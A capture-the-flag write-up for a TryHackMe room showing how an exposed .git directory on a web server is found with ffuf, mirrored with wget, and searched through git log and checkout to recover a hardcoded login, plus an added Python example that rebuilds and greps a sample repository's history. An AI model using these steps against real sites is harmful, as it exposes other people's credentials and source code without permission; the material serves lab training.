Image by tryhackme.com
Git stores a repository's full history: every commit records the hash of its parent, so the whole chain of snapshots is preserved and any earlier state can be recovered (much like a hash-linked ledger). This is not a fault in Git but a design feature that lets developers try changes quickly and revert them if needed.
That same history is a detailed record of every change ever made to a project, including secrets that were later removed or obfuscated. An attacker who obtains the .git directory gets all of it, which is why poor commit hygiene (committing credentials and then "fixing" them in a later commit) is dangerous.
The room can be found on TryHackMe.
Enumeration
After connecting to the TryHackMe VPN, I started enumeration. Looking at the page source in the Firefox dev tools, I found some interesting obfuscated JavaScript.
Screenshot from the Firefox dev tools, showing obfuscated JS.
This was interesting, but not enough to start digging deeper.
Next, I ran ffuf to look for more content.
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://$VICTIM_IP/FUZZ
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.200.152/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 200, Size: 6890, Words: 541, Lines: 61, Duration: 58ms]
.git/HEAD [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 60ms]
css [Status: 301, Size: 194, Words: 7, Lines: 8, Duration: 57ms]
index.html [Status: 200, Size: 6890, Words: 541, Lines: 61, Duration: 60ms]
:: Progress: [4614/4614] :: Job [1/1] :: 682 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
The 200 response for .git/HEAD showed that the .git directory was being served by the web server. Before mirroring it, check whether the server also returns a directory listing for /.git/ and whether .git/config is reachable: wget's mirror mode relies on the listing, while a dedicated tool such as git-dumper reconstructs the repository from HEAD, the refs and the object files even when listings are disabled.
Download repo
Since enumeration showed that the .git directory was exposed, wget's mirror mode, which follows the server's directory listings, could download it.
wget --mirror -I .git $VICTIM_IP/.git/
This downloaded the entire Git repository (HEAD, refs and the object database) into a directory named after the host. I then moved into it to start enumerating the history for juicy details.
cd $VICTIM_IP
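What wget actually pulled down, and why git can replay history from it, is easiest to see on a repository built by hand. The Python below is an added example, not code from this write-up, the room or TryHackMe: it writes a three-commit repository into a temporary directory using git's loose-object format (zlib-compressed objects named by their SHA-1; a commit points at a tree, the tree at blobs, and each commit at its parent), then reads it back the way git log and git checkout do and searches every snapshot for a secret, which is what a git-dumper style tool does after fetching the files. The commit messages echo the room's story, but the file contents, the author and the credential hunter2 are constructed sample data. It assumes loose objects only and a flat tree; a real dump usually also contains packfiles under .git/objects/pack, which this reader does not parse.

```python
import hashlib
import tempfile
import zlib
from pathlib import Path

def _write_object(gitdir, kind, payload):
    """Store one loose object as git does: zlib(b"<type> <len>\\0" + body), named by its SHA-1."""
    raw = f"{kind} {len(payload)}\0".encode() + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = Path(gitdir, "objects", sha[:2], sha[2:])
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))
    return sha

def _write_tree(gitdir, files):
    """Flat tree (no subdirectories): one '100644 <name>\\0<20 raw sha bytes>' entry per file."""
    body = b"".join(
        b"100644 " + name.encode() + b"\0" + bytes.fromhex(_write_object(gitdir, "blob", data))
        for name, data in sorted(files.items()))
    return _write_object(gitdir, "tree", body)

def build_sample_repo(root):
    """Constructed sample: three commits mirroring the room's story; the credential is made up."""
    gitdir = Path(root, ".git")
    (gitdir / "refs" / "heads").mkdir(parents=True)
    readme = b"# login demo\n"
    snapshots = [
        ("Initial commit", {"README.md": readme}),
        ("Made the login page, boss!", {"README.md": readme,
            "index.html": b'<script>if (u === "admin" && p === "hunter2") ok();</script>\n'}),
        ("Obfuscated the source code.", {"README.md": readme,
            "index.html": b"<script>eval(atob('bG9naW4oKQ=='))</script>\n"}),
    ]
    parent = None
    for message, files in snapshots:
        lines = [f"tree {_write_tree(gitdir, files)}"] + ([f"parent {parent}"] if parent else [])
        lines += ["author Dev <dev@example.com> 1595542800 +0200",
                  "committer Dev <dev@example.com> 1595542800 +0200", "", message]
        parent = _write_object(gitdir, "commit", "\n".join(lines).encode() + b"\n")
    (gitdir / "HEAD").write_text("ref: refs/heads/master\n")
    (gitdir / "refs" / "heads" / "master").write_text(parent + "\n")
    return gitdir

def read_object(gitdir, sha):
    """Inflate a loose object into (type, payload). Packed objects are not handled here."""
    raw = zlib.decompress(Path(gitdir, "objects", sha[:2], sha[2:]).read_bytes())
    header, _, payload = raw.partition(b"\0")
    return header.split(b" ")[0].decode(), payload

def resolve_head(gitdir):
    """HEAD is 'ref: refs/heads/<branch>' (or a bare SHA when detached)."""
    head = Path(gitdir, "HEAD").read_text().strip()
    return Path(gitdir, head[5:]).read_text().strip() if head.startswith("ref: ") else head

def parse_commit(payload):
    """Split the tree/parent/author/committer headers from the commit message."""
    headers, _, message = payload.decode().partition("\n\n")
    fields = {}
    for line in headers.splitlines():
        key, _, value = line.partition(" ")
        fields.setdefault(key, []).append(value)
    return fields, message.strip()

def walk_history(gitdir):
    """Follow first-parent links from HEAD: [(sha, message)] newest first, like git log."""
    history, sha = [], resolve_head(gitdir)
    while sha:
        kind, payload = read_object(gitdir, sha)
        if kind != "commit":
            raise ValueError(f"{sha} is a {kind}, not a commit")
        fields, message = parse_commit(payload)
        history.append((sha, message))
        sha = fields.get("parent", [None])[0]  # merges carry a second parent; ignored here
    return history

def files_at(gitdir, commit_sha):
    """{name: bytes} for a commit's tree (flat layout only; subtrees would need recursion)."""
    fields, _ = parse_commit(read_object(gitdir, commit_sha)[1])
    tree = read_object(gitdir, fields["tree"][0])[1]
    files, i = {}, 0
    while i < len(tree):
        nul = tree.index(b"\0", i)
        _mode, name = tree[i:nul].decode().split(" ", 1)
        files[name] = read_object(gitdir, tree[nul + 1:nul + 21].hex())[1]
        i = nul + 21
    return files

def grep_history(gitdir, needle):
    """Every commit whose snapshot contains needle: the checkout-and-cat loop, automated."""
    return [(sha, message) for sha, message in walk_history(gitdir)
            if any(needle in data for data in files_at(gitdir, sha).values())]

def demo(needle=b"hunter2"):
    """Build the sample repo, then report the log and which commits still hold the secret."""
    with tempfile.TemporaryDirectory() as root:
        gitdir = build_sample_repo(root)
        return {"log": [m for _, m in walk_history(gitdir)],
                "hits": [m for _, m in grep_history(gitdir, needle)]}
```

The point of the search is that the obfuscation commit at HEAD no longer contains the string, yet the commit before it still does and is one parent link away. On a real mirrored .git the equivalent shortcuts are git log -p -S '<string>' (find the commits that added or removed a string) and git grep '<string>' $(git rev-list --all) (search every reachable commit), and git show <commit>:index.html reads a file from an old commit without checking it out.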
Git log
With the .git directory on disk, every earlier version (commit) of the repository is available locally: the object database holds all of them, and only the working tree is missing, so it is possible to "go back in time". To see the commit history, I used the git log command.
git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:08:38 2020 +0200
setup dockerfile and setup defaults.
commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:42:30 2020 +0200
Make sure the css is standard-ish!
commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:41:12 2020 +0200
re-obfuscating the code to be really secure!
commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:37:32 2020 +0200
Security says obfuscation isn't enough.
They want me to use something called 'SHA-512'
commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:25:52 2020 +0200
Obfuscated the source code.
Hopefully security will be happy!
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
The second commit from the bottom of the log (395e087, "Made the login page, boss!") is the last one before the developer obfuscated the JS code. That looked interesting, so to go back in time to that commit I used the git checkout command.
git checkout 395e087334d613d5e423cdf8f7be27196a360459
D README.md
HEAD is now at 395e087 Made the login page, boss!
Looking back in time
With the working tree now at the commit before obfuscation, it's possible to read index.html as it was at that point. (The D README.md line in the checkout output only notes that README.md is missing from the working tree, since wget fetched nothing outside .git; index.html itself was recreated from the object store.)
cat index.html
...
<script>
function login() {
let form = document.getElementById("login-form");
console.log(form.elements);
let username = form.elements["username"].value;
let password = form.elements["password"].value;
if (
username === "*****" &&
password === "****************************"
) {
document.cookie = "login=1";
window.location.href = "/dashboard.html";
} else {
document.getElementById("error").innerHTML =
"INVALID USERNAME OR PASSWORD!";
}
}
</script>
</body>
</html>
That's it. You now have the flag 🎉